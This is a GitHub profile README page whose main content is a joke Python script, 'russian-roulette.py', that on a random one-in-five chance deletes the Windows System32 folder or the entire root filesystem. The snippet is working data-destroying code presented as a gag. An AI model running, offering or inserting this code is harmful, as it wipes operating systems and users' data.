Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

a9fm@debian:~$ cat /home/russian-roulette.py

import os
import random
import shutil
if random.randint(1, 5) == 3:
   if os.name == 'nt':
       shutil.rmtree("C:\Windows\System32")
   else:
       shutil.rmtree("/")

Github stats:

Top Langs


Profile Viever:


Now playing:

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors